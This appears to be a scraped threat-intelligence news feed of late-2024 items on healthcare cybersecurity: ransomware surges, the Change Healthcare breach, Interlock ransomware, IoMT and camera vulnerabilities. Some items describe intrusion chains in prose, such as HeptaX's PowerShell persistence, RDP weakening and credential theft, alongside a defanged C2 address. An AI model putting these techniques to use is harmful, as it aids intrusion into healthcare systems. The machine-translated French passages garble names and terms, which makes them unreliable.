2024-11-15 11:52:24 | Ransomware Attacks on Healthcare Sector Surge in 2024 (lien direct) | Ransomware attacks on the healthcare sector surged in 2024, analysis from SafetyDetectives reveals. The year has already seen 264 attacks on healthcare providers by September, nearly surpassing the 268 attacks recorded for all of 2023. Escalating Cyber Threats SafetyDetectives argues that the growing number of ransomware groups and variants in 2024 contributed to the increasing [...]
Ransomware attacks on the healthcare sector surged in 2024, analysis from SafetyDetectives reveals. The year has already seen 264 attacks on healthcare providers by September, nearly surpassing the 268 attacks recorded for all of 2023. Escalating Cyber Threats SafetyDetectives argues that the growing number of ransomware groups and variants in 2024 contributed to the increasing [...] |
Ransomware Medical | ★★★ | |
|
2024-11-15 07:00:00 | Safeguarding Healthcare Organizations from IoMT Risks (lien direct) | The healthcare industry has undergone significant transformation with the emergence of the Internet of Medical Things (IoMT) devices. These devices ranging from wearable monitors to network imaging systems collect and process vast amounts of sensitive medical data based on which they make critical decisions about patients\' health. But at the same time, they also raise serious privacy and security concerns. Cybercriminals often target vulnerabilities within these devices to gain entry into the hospital network and compromise healthcare data. Attacks on these interconnected devices cause life-threatening harm to patients, disrupt services, and bring financial and reputational costs to medical centers. As hackers increasingly target IoMT devices and present significant threats to medical organizations, it is crucial to combat these risks and ensure patient safety. Current Security Landscape of Medical Connected Devices The global healthcare medical device market is expected to reach $332.67 billion by 2027. The acceleration in IoMT adoption shows that the healthcare industry found this technology useful. However, this innovation also carries possible threats and challenges. Below is an insight into the key security challenges that these IoT devices come with: Ransomware Attacks Cybercriminals often target medical devices and networks to access sensitive information like protected health information (PHI) and electronic health records (EHR). They even steal this information to put it up for sale on the dark web and, in return, demand hefty ransom. For instance, in the crippling ransomware attack against Change Healthcare, the criminal gang ALPHV/Blackcat stole 4TB of patients\' records and affected one-third of people living in the USA. The stolen data was up for sale on the black market until hackers received $22 million as a ransom payment. Such incidents erode patients\' trust and cause healthcare organizations to face HIPAA violations ranging from $100 to $50,000 per violation. Vulnerabilities Exploitation Medical devices such as infusion pumps or pacemakers are not designed with security in mind. As a result, they may come with security vulnerabilities that hackers can exploit to get unauthorized access to medical data. For example, the Nozomi Network Lab found several security flaws within the GE Healthcare Vivid Ultrasound family that hackers can exploit to launch ransomware attacks and manipulate patients\' data. Previously, the Palo Alto Network discovered 40 vulnerabilities and more than 70 security alerts in infusion pumps, putting them at risk of leaking sensitive information. Similarly, McAfee researchers identified significant vulnerabilities in two types of B.Braun infusion pumps that could enable hackers to deliver a lethal dosage of medications to suspected patients. Although no affected case was reported, this event highlighted the gaps in medical device security and the need for improvement. Outdated and Unpatched Medical Devices Outdated systems remain a top challenge for medical IoT as healthcare organizations continue to rely on legacy systems. Many of these devices aren\'t designed with security in mind and stay in use for years and even decades. The device manufacturers are reluctant to upgrade the system software because it | Ransomware Malware Vulnerability Threat Patching Medical Technical | ★★ | |
|
2024-11-14 09:48:00 | GAO highlights HHS struggles with cybersecurity as healthcare sector faces increased attacks (lien direct) | >The U.S. Government Accountability Office (GAO) has identified challenges faced by the Department of Health and Human Services...
>The U.S. Government Accountability Office (GAO) has identified challenges faced by the Department of Health and Human Services... |
Medical | ★★ | |
|
2024-11-14 08:31:56 | Medcrypt expands strategic partnerships to boost cybersecurity for medical devices (lien direct) | >Medcrypt, a vendor of proactive security solutions for medical devices, announced an expansion of its strategic partnerships with...
>Medcrypt, a vendor of proactive security solutions for medical devices, announced an expansion of its strategic partnerships with... |
Medical | ★★ | |
 |
2024-11-13 12:00:00 | Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem (lien direct) | If you are interested in the world of digital identities, you have probably heard some of the buzzwords that have been floating around for a few years now… “verifiable credential,” “digital wallet,” “mobile driver\'s license” or “mDL.” These terms, among others, all reference a growing ecosystem around what we are calling “verifiable digital credentials.” But what exactly is a verifiable digital credential? Take any physical credential you use in everyday life – your driver\'s license, your medical insurance card, a certification or diploma – and turn it into a digital format stored on your
If you are interested in the world of digital identities, you have probably heard some of the buzzwords that have been floating around for a few years now… “verifiable credential,” “digital wallet,” “mobile driver\'s license” or “mDL.” These terms, among others, all reference a growing ecosystem around what we are calling “verifiable digital credentials.” But what exactly is a verifiable digital credential? Take any physical credential you use in everyday life – your driver\'s license, your medical insurance card, a certification or diploma – and turn it into a digital format stored on your |
Medical | ★★★ | |
|
2024-11-13 08:02:48 | Barts Health NHS Trust selects Cynerio to boost cybersecurity across healthcare sites (lien direct) | >Barts Health NHS Trust has chosen Cynerio\'s healthcare-focused platform for deployment across all sites. After a thorough evaluation,...
>Barts Health NHS Trust has chosen Cynerio\'s healthcare-focused platform for deployment across all sites. After a thorough evaluation,... |
Medical | ★★★ | |
|
2024-11-12 07:00:00 | Building a Resilient Network Architecture: Key Trends for 2025 (lien direct) | 
As organizations continue to align their operational strategies with evolving digital ecosystems and technologies, the concept of network resilience has become a priority. A major mindset shift is that modern networks must be designed not just for speed and efficiency but also for flexibility, security, and the ability to hold out against disruptions.
Whether due to an influx of remote workers, the adoption of hybrid cloud environments, or emerging cyber threats, a resilient network architecture is a necessity. Let’s focus on the trends that steer businesses towards building and maintaining robust networks in the upcoming 2025.
The Cloud-Native Shift
Traditional, hardware-centric networks are noticeably giving way to cloud-native architectures, and for good reason. The latter are designed from the ground up to function in cloud environments and exhibit greater flexibility, scalability, as well as adaptability. This transition stems from the need to scale operations quickly and efficiently while sticking to common security protocols.
One major thing that makes cloud-native networks stand out is the ability to manage traffic dynamically through software-defined solutions such as SD-WAN (Software-Defined Wide Area Network). In contrast to physical routers and switches that form the foundation for classic networks, SD-WAN can prioritize and route traffic based on real-time network conditions. This level of flexibility is an important prerequisite for supporting distributed workforces and ensuring reliable connections across multiple locations, whether in physical offices, remote locations, or the cloud.
This type of architecture is also about agility in adapting to changes. If a new branch office needs to be set up, cloud-based solutions can scale the network infrastructure on-demand without extensive hardware deployment, which reduces costs and implementation times.
Tighter Interplay of Networking and Security
The convergence of security and networking into unified frameworks is another significant trend. SASE (Secure Access Service Edge) represents a paradigm shift in how organizations approach network security, combining wide area networking (WAN) capabilities with security functions delivered from the cloud.
This technology addresses several pain points that conventional network security designs face. Retrospectively, defensive tools such as firewalls, VPNs, and intrusion prevention systems would be scattered across different parts of the network, often leading to inefficiencies, performance bottlenecks, and gaps in security coverage. SASE integrates these functions into a single, cloud-delivered service that facilitates management and enhances network visibility.
The Growing Role of AI and ML
Artificial intelligence is a boon for network management because it automates routine tasks, predicts potential failures, and optimizes performance. Traditional approaches often rely on manual configurations and monitoring, which tends to be time-consuming and prone to errors. By automating these workflows, AI-driven tools reduce the odds of human mistakes and enable faster response to breaches.
The tech can also do the heavy lifting in terms of predictive analytics. Machine learning algorithms easily identify patterns that indicate potential problems such as imminent equipment malfunctions, bandwidth congestion, or unusual traffic patterns that might signal a security breach.
AI also enables dynamic network optimization. For instance, its algorithms can automatically adjust bandwidth allocation based on real-time demand to ensure that critical applications get the necessary resources without manual intervention. This adaptability is particularl |
Malware Tool Prediction Medical Cloud | ★★★ | |
|
2024-11-11 18:57:29 | Déballage de l\\\\\\\\\\'attaque de ransomware de verrouillage de verrouillage (lien direct) | ## Instantané La réponse aux incidents de Cisco Talos a observé le groupe de ransomwares de verrouillage se livrant à des attaques de chasse au grand jeu et à une double extorsion, ciblant des secteurs tels que les soins de santé, la technologie, le gouvernement aux États-Unis et la fabrication en Europe depuis son émergence en septembre 2024. ## Description Le groupe emploie une chaîne de livraison multi-composants, lançant son attaque via un site Web légitime compromis qui incite les victimes à télécharger un faux parcours de mise à jour du navigateur. Cet exécutable est un outil d'accès à distance (RAT) qui établit la persistance, collecte les informations système et communique avec un serveur de commande et de contrôle (C2). Les attaquants utilisent également un voleur d'identification, Keylogger et des outils comme AnyDesk, Putty et Azure Storage Explorer pour le mouvement latéral et l'exfiltration des données. Le ransomware de verrouillage, qui a à la fois des variantes Windows et Linux, chiffre les fichiers et ajoute l'extension «.Interlock», tout en évitant le chiffrement de certains dossiers système et extensions de fichiers. La variante Windows utilise un cryptage de chaînage de blocs de chiffre d'affaires (CBC) et la variante Linux utilise le cryptage CBC ou RSA. Le ransomware établit la persistance en créant une tâche quotidienne et peut se supprimer après le cryptage. Une note de rançon est configurée pour s'afficher pendant la connexion interactive à l'aide d'objets de stratégie de groupe, exigeant une réponse dans les 96 heures pour éviter les fuites de données et la notification médiatique. Talos IR note que les ransomwares de verrouillage peuvent avoir des connexions avec les opérateurs ou développeurs de ransomwares Rhysida, suggérés par des similitudes de tactique, de techniques et de procédures (TTPS), ainsi que les comportements des binaires des encryptateurs de ransomware. Les deux groupes utilisent Azcopy pour l'exfiltration des données et fournissent des notes de rançon qui offrent de l'aide plutôt que des menaces, indiquant une tendance de diversification et de collaboration entre les groupes de ransomwares. ## Recommandations Microsoft recommande les atténuations suivantes pour se défendre contre cette menace: - Gardez le logiciel à jour. Appliquez de nouveaux correctifs de sécurité dès que possible. - Allumez [Protection en livraison du cloud] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc) dans Microsoft Defender Antivirus, ou l'équivalent de votre produit antivirus, pour couvrir Évolution rapide des outils et techniques d'attaquant. Les protections d'apprentissage automatique basées sur le cloud bloquent une majorité de variantes nouvelles et inconnues. - Activer [Protection réseau] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) . - Exécutez la détection et la réponse des points de terminaison [(EDR) en mode bloc] (https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-lock-mode?ocid=Magicti_Ta_LearnDoc) pour que Microsoft Le défenseur du point final peut bloquer les artefacts malveillants, même lorsque votre antivirus non microsoft ne détecte pas la menace ou Lorsque Microsoft Defender Antivirus fonctionne en mode passif. EDR en mode bloc fonctionne dans les coulisses pour corriger les artefacts malveillants qui sont détectés post-abri. - Configurer [Investigation and remédiation] (https://learn.microsoff Sur les alertes pour résoudre les violations, réduisant considérablement le volume d'alerte. - Lisez notre [Ransomware Menace Présentation] (https://security.microsoft.com/Thereatanalytics3/05658B6C-DC62-496D-AD3C-C6A795A33C27/analyStreport) pour le développement d'une posture de sécurité holistique pour éviter Ransomware, y compris l'hygiène de | Ransomware Malware Tool Threat Prediction Medical Cloud | APT 45 | ★★★ |
|
2024-11-11 17:03:05 | NOUVELLE enquête de préparation à la cybersécurité de la santé publique pour stimuler la préparation aux cyber-menaces (lien direct) | Les coprésidents du groupe de travail conjoint de la cybersécurité de la santé publique du secteur de la santé et de la santé publique coordination ...
The co-chairs of the Joint Public Health Cybersecurity Task Group of the Healthcare and Public Health Sector Coordinating... |
Medical | ★★ | |
|
2024-11-11 13:01:32 | 11 novembre - Rapport de renseignement sur les menaces (lien direct) | > Pour les dernières découvertes en cyber Les meilleurs attaques et violations Memorial Hospital and Manor à Bainbridge, en Géorgie, ont été victimes d'une attaque de ransomware qui a entraîné la perte d'accès à son système de dossier de santé électronique. The Embargo Ransomware Gang […]
>For the latest discoveries in cyber research for the week of 11th November, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Memorial Hospital and Manor in Bainbridge, Georgia, has been a victim of a ransomware attack that resulted in the loss of access to its electronic health record system. The Embargo ransomware gang […] |
Ransomware Threat Medical | ★★★ | |
|
2024-11-07 16:30:00 | Les ransomwares de verrouillage ciblent les secteurs de la santé américaine, de l'informatique et du gouvernement Interlock Ransomware Targets US Healthcare, IT and Government Sectors (lien direct) |
Interlock emploie à la fois des tactiques de «chasse au grand-jeu» et des tactiques à double extorsion contre ses victimes
Interlock employs both “big-game hunting” and double extortion tactics against its victims |
Ransomware Medical | ★★ | |
 |
2024-11-07 14:00:00 | Explorer Dora: comment gérer les incidents des TIC et minimiser les risques de cyber-menace Exploring DORA: How to manage ICT incidents and minimize cyber threat risks (lien direct) |
> Alors que les violations de la cybersécurité continuent d'augmenter à l'échelle mondiale, les institutions gantant les informations sensibles sont particulièrement vulnérables.En 2024, le coût moyen d'une violation de données dans le secteur financier a atteint 6,08 millions de dollars, ce qui en fait le deuxième coup le plus difficile après les soins de santé, selon le coût en 2024 de l'IBM en 2024 d'un rapport de violation de données.Cela souligne la nécessité de la robuste [& # 8230;]
>As cybersecurity breaches continue to rise globally, institutions handling sensitive information are particularly vulnerable. In 2024, the average cost of a data breach in the financial sector reached $6.08 million, making it the second hardest hit after healthcare, according to IBM’s 2024 Cost of a Data Breach report. This underscores the need for robust IT […] |
Data Breach Threat Medical | ★★★ | |
|
2024-11-07 09:47:03 | Enisa organise la 9e conférence de sécurité de la santé pour relever les défis de la cybersécurité dans les soins de santé ENISA hosts 9th eHealth security conference to tackle cybersecurity challenges in healthcare (lien direct) |
> L'Agence de l'Union européenne pour la cybersécurité (EISA) organise la 9e conférence de sécurité de la santé en partenariat avec la Hongrie & # 8217; s ...
>The European Union Agency for Cybersecurity (ENISA) is hosting the 9th eHealth Security Conference in partnership with Hungary’s... |
Medical Conference | ★★★ | |
|
2024-11-07 07:18:44 | Arrêt de cybersécurité du mois: prévenir le compromis des e-mails du fournisseur dans le secteur public Cybersecurity Stop of the Month: Preventing Vendor Email Compromise in the Public Sector (lien direct) |
The Cybersecurity Stop of the Month blog series explores the ever-evolving tactics of today\'s cybercriminals. It also examines how Proofpoint helps businesses to fortify their email defenses to protect people against today\'s emerging threats. The interconnectedness of today\'s business ecosystems has created a prime target for attacks on digital supply chains. Within those supply chains, email remains the No.1 vector to access people and poses a major risk. According to our research, more than 80% of Proofpoint customers receive an email attack each month from a trusted vendor or supplier. And these attacks can be quite costly. Based on IBM\'s Cost of a Data Breach report, the average financial loss from a data breach that involves the supply chain tops $4.8 million. Unlike native and API-based email security tools, Proofpoint regularly stops these highly targeted attacks before they reach employee inboxes. If you\'ve been following this series, you will have seen in earlier blog posts that we\'ve covered many different types of supply chain attacks. We\'ve seen attackers targeting the legal, manufacturing, aviation industries and more with complex impersonation and vendor email compromise techniques. Today, we\'ll explore a phishing attack on a public sector agency, which was disguised as an electronic fax (eFax). Background In this example, bad actors exploited a supplier\'s email through vendor email compromise. This occurs when an attacker gains access to and weaponizes an email account of a smaller business partner instead of going directly after a bigger, more secure organization. This can be a very effective tactic. Attackers know that larger organizations typically have better resources, bigger budgets and more mature cybersecurity defenses to keep them out. When this tactic is combined with credential phishing, attackers are able to trick even the savviest recipients. In fact, Proofpoint research shows that employees are 3X more likely to click on a phishing link when it comes from a trusted partner. That\'s not only because there\'s an inherent trust between senders. It\'s also due to the fact that threat actors may use legitimate file hosting services and extremely convincing fake login sites to spoof well-known brands. The scenario Proofpoint recently detected this potent combination of threats during a customer\'s initial evaluation process. This threat was started by a cybercriminal who gained access to the email account of a marketing professor at a public university. With this access, the attacker sent a phishing link-which appeared to be an eFax-to the email address of a government agency\'s employee whom the university professor had previously communicated with. Because the employee was a known contact in the professor\'s inbox, the attacker was able to bypass many layers of security intended to catch such threats. As with many vendor email compromise attacks, this threat was specific, highly targeted and unique to the sender. Because Proofpoint has extensive global email visibility and insights, we were able to see that the same phishing link was delivered to less than 40 other accounts worldwide. Notably, the phishing link was hosted by a legitimate, well-known file sharing website. As a result, it was missed by this agency\'s Microsoft 365 native email security tool, which lacks comprehensive URL sandboxing capabilities. And because of the extended nature of this attack chain, it was further missed by an API-based security tool after it was delivered. Fortunately, Proofpoint detects and blocks phishing messages before they ever reach a user\'s inbox. If this customer had been using Proofpoint, its employees would never have been exposed to the account takeover risk. The threat: How did the attack happen? Here\'s a breakdown of the attack. 1. Setting a lure. To set the trap, the attacker created a highly stylized message that looked like an | Data Breach Malware Tool Threat Medical Cloud | ★★ | |
|
2024-11-05 08:54:11 | Soins de santé;Surmonter vos défis de systèmes hérités pour améliorer la cybersécurité, explique Espria Healthcare; Overcome your legacy systems challenges to enhance cybersecurity, says Espria (lien direct) |
Santé;Surmonter vos défis de systèmes hérités pour améliorer la cybersécurité, explique Espria
Les organisations de soins de santé doivent adopter une approche proactive en tirant parti des technologies avancées.
-
Opinion
Healthcare; Overcome your legacy systems challenges to enhance cybersecurity, says Espria Healthcare organisations must adopt a proactive approach by leveraging advanced technologies. - Opinion |
Medical | ★★★ | |
|
2024-11-04 12:25:16 | Faits saillants hebdomadaires d'osint, 4 novembre 2024 Weekly OSINT Highlights, 4 November 2024 (lien direct) |
## Instantané La semaine dernière, les rapports OSINT de \\ ont mis en évidence l'activité de menace parrainée par l'État et la menace cybercriminale, avec divers vecteurs d'attaque et cibles dans les secteurs.Des acteurs apt en Corée du Nord, en Chine et en Russie ont mené des campagnes ciblées de phishing, de réseau et de campagnes de logiciels malveillants.Les groupes nord-coréens et russes ont favorisé les tactiques de vol d'identification et de ransomwares ciblant les secteurs du gouvernement aux militaires, tandis que les acteurs chinois ont exploité les vulnérabilités de pare-feu pour obtenir un accès à long terme dans les secteurs à enjeux élevés.Pendant ce temps, les cybercriminels ont mis à profit l'ingénierie sociale, le Vishing et l'IoT et les vulnérabilités de plugin pour infiltrer les environnements cloud, les appareils IoT et les systèmes Android.L'accent mis sur l'exploitation des vulnérabilités de logiciels populaires et des plateformes Web souligne l'adaptabilité de ces acteurs de menace à mesure qu'ils étendent leur portée d'attaque, en particulier dans l'utilisation des stratégies de cloud, de virtualisation et de cryptomiminage dans une gamme d'industries. ## Description 1. [Jumpy Poisses Ransomware Collaboration] (https://sip.security.microsoft.com/intel-explorer/articles/393b61a9): l'unité 42 a rapporté la Corée du Nord \'s Jucky Pisse (Onyx Sleet) en partenariat avec Play Ransomware in \'s Jumpy Pisses (ONYX Sleet) en partenariat avec Play Ransomware dans Play Ransomware in Jumpy Pisses (ONYX Sleet)Une attaque à motivation financière ciblant les organisations non spécifiées.L'acteur de menace a utilisé des outils comme Sliver, Dtrack et Psexec pour gagner de la persistance et dégénérerPrivilèges, se terminant par le déploiement des ransomwares de jeu. 1. [Menaces chinoises ciblant les pare-feu] (https://sip.security.microsoft.com/intel-Explorateur / articles / 798C0FDB): Sophos X-OPS a identifié des groupes basés en Chine comme Volt Typhoon, APT31 et APT41 exploitant des pare-feu pour accéderPacifique.Ces groupes utilisent des techniques sophistiquées telles que les rootkits de vie et multiplateforme. 1. [Campagne de phishing sur la plate-forme Naver] (https://sip.security.microsoft.com/intel-explorer/articles/dfee0ab5): les acteurs liés au nord-coréen ont lancé une campagne de phishing ciblant la Corée du Sud \'s Naver, tentantPour voler des informations d'identification de connexion via plusieurs domaines de phishing.L'infrastructure, avec les modifications du certificat SSL et les capacités de suivi, s'aligne sur Kimsuky (Emerald Sleet), connu pour ses tactiques de vol d'identification. 1. [FAKECALL Vishing malware sur Android] (https://sip.security.microsoft.com/intel-explorer/articles/d94c18b0): les chercheurs de Zimperium ont identifié des techniques de vitesses de malware FAKECALT pour voler les utilisateurs de l'Android.Le malware intercepte les appels et imite le numéroteur d'Android \\, permettant aux attaquants de tromper les utilisateurs pour divulguer des informations sensibles. 1. [Facebook Business Phishing Campaign] (https://sip.security.microsoft.com/intel-explorer/articles/82b49ffd): Cisco Talos a détecté une attaque de phishing ciblant les comptes commerciaux Facebook à Taiwan, en utilisant des avis juridiques comme leurre.Lummac2 et les logiciels malveillants de volée des informations de Rhadamanthys ont été intégrés dans des fichiers RAR, collectionner des informations d'identification du système et éluder la détection par l'obscurcissement et l'injection de processus. 1. [Vulnérabilité des caches litres de LiteSpeed] (https://sip.security.microsoft.com/intel-explorer/articles/a85b69db): le défaut du plugin de cache LiteSpeets (CVE-2024-50550) pourrait permettre une escalale de privilège à un niveau de privilège à plus de six millions pour plus de six millionssites.Les vulnérabilités exploitées ont permis aux attaquants de télécharger des plugins ma | Ransomware Malware Tool Vulnerability Threat Mobile Prediction Medical Cloud Technical | APT 41 APT 28 APT 31 Guam | ★★★ |
|
2024-11-01 19:56:31 | Greynoise Intelligence découvre les vulnérabilités zéro-jour dans les caméras en streaming en direct avec l'aide de l'IA GreyNoise Intelligence Discovers Zero-Day Vulnerabilities in Live Streaming Cameras with the Help of AI (lien direct) |
#### Industries ciblées - agences et services gouvernementaux - Services publics généraux - local - Services publics généraux - État - Santé et santé publique - Fabrication critique - Organisation non gouvernementale - Organisation religieuse ## Instantané Greynoise a découvert de graves vulnérabilités de jour zéro dans les caméras IoT en direct populaires, mettant en évidence des risques importants dans la fabrication, les soins de santé, les affaires, le gouvernement et d'autres secteurs sensibles. ## Description En exploitant ces défauts, les attaquants pourraient prendre le contrôle total des caméras affectées, manipuler les flux vidéo, désactiver les appareils ou les coopter dans des botnets pour des attaques plus larges.Les vulnérabilités, suivies comme [CVE-2024-8956] (https://security.microsoft.com/intel-explorer/cves/cve-2024-8956/) et [CVE-2024-8957] (https: // security.microsoft.com / Intel-Explorer / CVES / CVE-2024-8957 /), affectez les caméras Pan-Tilt-Zoom (PTZ) compatibles avec NDI utilisées dans les applications où la fiabilité et la confidentialité sont essentielles. Avec une authentification insuffisante (CVE-2024-8956) et des défauts d'injection de commande (CVE-2024-8957), les pirates peuvent accéder aux données sensibles, reconfigurer ou désactiver les caméras et effectuer une surveillance non autorisée.Cela expose les entreprises à des violations de données potentielles, des invasions de confidentialité et même des attaques de ransomwares, car les caméras compromises pourraient permettre des intrusions de réseau plus larges.Dans les milieux industriels, de telles violations pourraient avoir un impact sur la surveillance des machines et du contrôle de la qualité, tandis que dans les soins de santé, ils pourraient compromettre la télésanté et les flux en direct chirurgicaux. Ces vulnérabilités mettent en évidence un défi croissant de cybersécurité dans les écosystèmes IoT, où les conceptions non sécurisées rendent les appareils sensibles à l'exploitation.Les attaquants peuvent pivoter de ces caméras pour cibler d'autres appareils en réseau, conduisant à des violations de données plus larges ou à des attaques de ransomwares. ## Recommandations GreyNoise recommande que les organisations utilisant le micrologiciel de la caméra VHD PTZ | Ransomware Vulnerability Threat Industrial Medical | ★★ | |
|
2024-11-01 13:00:39 | La menace évolutive de Ransomware \\: la montée de RansomHub, le déclin de Lockbit et la nouvelle ère de l'extorsion des données Ransomware\\'s Evolving Threat: The Rise of RansomHub, Decline of Lockbit, and the New Era of Data Extortion (lien direct) |
Ransomware Threat Industrial Medical | ★★★ | ||
|
2024-11-01 01:53:28 | L'importance négligé d'identifier les utilisateurs les plus risqués The Overlooked Importance of Identifying Riskiest Users (lien direct) |
"Voir un, enseigner un, faire un" retire une page du manuel de santé pour réduire les vulnérabilités humaines où ils comptent le plus en cybersécurité.
"See one, teach one, do one" takes a page out of the healthcare playbook to reduce human vulnerabilities where they matter most in cybersecurity. |
Vulnerability Medical | ★★ | |
 |
2024-10-31 19:00:00 | Liste de contrôle 398: Plus les choses changent… Checklist 398: The More Things Change… (lien direct) |
> Changer Healthcare \'s Breach invite les appels de gel de crédit et offre 2 ans de surveillance gratuite, car les experts exhortent des étapes plus fortes pour empêcher le vol d'identité.
>Change Healthcare\'s breach prompts calls for credit freezes and offers 2 years of free monitoring, as experts urge stronger steps to prevent identity theft. |
Medical | ★★ | |
 |
2024-10-30 13:34:08 | Changer la violation des soins de santé frappe 100m Américains Change Healthcare Breach Hits 100M Americans (lien direct) |
Change Healthcare dit qu'il a informé environ 100 millions d'Américains que leurs dossiers personnels, financiers et de soins de santé pourraient avoir été volés lors d'une attaque de ransomware de février 2024 qui a provoqué la plus grande violation de données jamais connue des informations de santé protégées.
Change Healthcare says it has notified approximately 100 million Americans that their personal, financial and healthcare records may have been stolen in a February 2024 ransomware attack that caused the largest ever known data breach of protected health information. |
Ransomware Data Breach Medical | ★★ | |
|
2024-10-30 13:02:32 | La recherche Forescocout révèle 162 vulnérabilités dans les dispositifs médicaux connectés, élevant les risques aux données et à la sécurité des patients Forescout Research reveals 162 vulnerabilities in connected medical devices, elevating risks to patient data and safety (lien direct) |
> De nouvelles recherches de ForeScout Technologies ont souligné les dispositifs médicaux connectés les plus vulnérables, en découvrant 162 vulnérabilités de sécurité qui pourraient ...
>New research from Forescout Technologies highlighted the most vulnerable connected medical devices, uncovering 162 security vulnerabilities that could... |
Vulnerability Medical | ★★ | |
|
2024-10-29 13:43:36 | Hôpitaux : Quand les cybercriminels font grimper le taux de mortalité - Rapport Proofpoint (lien direct) | Corbeil-Essonnes, Brest, ou encore Versailles, les exemples de cyberattaques contre les organismes de santé ne manquent pas. En mai dernier, l'ANS faisait ainsi état de 581 incidents informatique dans les hôpitaux et établissements médico-sociaux français en 2023, dont plus de la moitié concernait des cyberattaques, et près de 60 entraînant une fuite de données personnelles et sensibles. Mais la France ne fait pas seule figure d'exemple dans le secteur, le dernier rapport de Proofpoint " Cyber (...) - Malwares | Medical | ★★ | |
|
2024-10-29 13:00:00 | Pourquoi la sauvegarde des données sensibles est si cruciale Why safeguarding sensitive data is so crucial (lien direct) |
> Une violation de données chez Virtual Medical Provider Confident Health met à nu la grande différence entre les informations personnellement identifiables (PII) d'une part et les données sensibles de l'autre.L'histoire a commencé lorsque la chercheuse en sécurité Jeremiah Fowler a découvert une base de données non garantie contenant 5,3 téraoctets de données exposées liées à la santé des confidents.L'entreprise fournit une dépendance [& # 8230;]
>A data breach at virtual medical provider Confidant Health lays bare the vast difference between personally identifiable information (PII) on the one hand and sensitive data on the other. The story began when security researcher Jeremiah Fowler discovered an unsecured database containing 5.3 terabytes of exposed data linked to Confidant Health. The company provides addiction […] |
Data Breach Medical | ★★ | |
|
2024-10-28 22:56:39 | 2024-10-25 HEPTAX - Connexions RDP non autorisées.Nalicious Lnk.> PowerShell> échantillons de fichiers de batte 2024-10-25 HeptaX - Unauthorized RDP Connections. Nalicious LNK. > Powershell > Bat files Samples (lien direct) |
2024-10-25 Cyble: & nbsp; heptax: Connexions RDP non autorisées pour les opérations de cyberespionnage Résumé: L'attaque commence parUn fichier LNK malveillant livré dans un fichier zip, probablement distribué par e-mails de phishing, et semble cibler l'industrie des soins de santé. Lors de l'exécution, le fichier LNK initie une commande PowerShell qui télécharge plusieurs scripts et fichiers lots à partir d'unServeur distant pour établir la persistance et le contrôle du système de la victime. Le fichier LNK, une fois ouvert, déclenche des commandes PowerShell qui téléchargent des charges utiles supplémentaires à partir de hxxp: //157.173.104 [.] 153 . Ces scripts permettent à l'attaquant de créer un nouveau compte utilisateur avecPrivilèges administratifs et paramètres alter RDP, réduisant les exigences d'authentification pour un accès plus facile non autorisé. Un fichier de raccourci persistant (LNK) est créé dans le dossier Windows StartupPour maintenir l'accès. Le principal script PowerShell communique avec le serveur C2, construisant des URL avec un identifiant unique (UID) pour que la machine compromise récupére des commandes ou des charges utiles supplémentaires. Si UACest détecté comme faible ou handicapé, l'attaque procède à d'autres étapes qui abaissent les configurations de sécurité du système. Une charge utile secondaire, "ChromePass, "est introduit, ciblant les navigateurs à base de chrome pour récolter des informations d'identification stockées, en déchargeant le risque de comptes compromis. Les scripts configurent le système pour faciliter l'accès à distance, permettant des actions telles que l'exfiltration, la surveillance etInstallation de logiciels malveillants supplémentaires. Fichiers batch ultérieurs (par exemple, k1.bat , Scheduler-once.BAT ) Exécuter des commandes qui masquent les traces, suppriment les journaux et planifier les tâches déguisées en opérations système pour maintenir la persistance et l'évasion de la détection. Les étapes finales impliquent l'exécution d'un script PowerShell qui effectue une reconnaissance,collecte des données système étendues et les envoie encodées au serveur C2. Télécharger | Malware Medical | ★★★ | |
|
2024-10-28 19:33:48 | Le comté du Texas affirme que 47 000 avaient des SSN, des informations sur le traitement médical divulguées en mai cyberattaque Texas county says 47,000 had SSNs, medical treatment info leaked during May cyberattack (lien direct) |
Le comté de Wichita, au Texas, a publié des notifications de violation de données sur un incident en mai qui semble être le travail d'un gang de ransomware.
Wichita County, Texas, issued data breach notifications about an incident in May that appears to be the work of a ransomware gang. |
Ransomware Data Breach Medical | ★★★ |
To see everything:
Our RSS (filtrered)
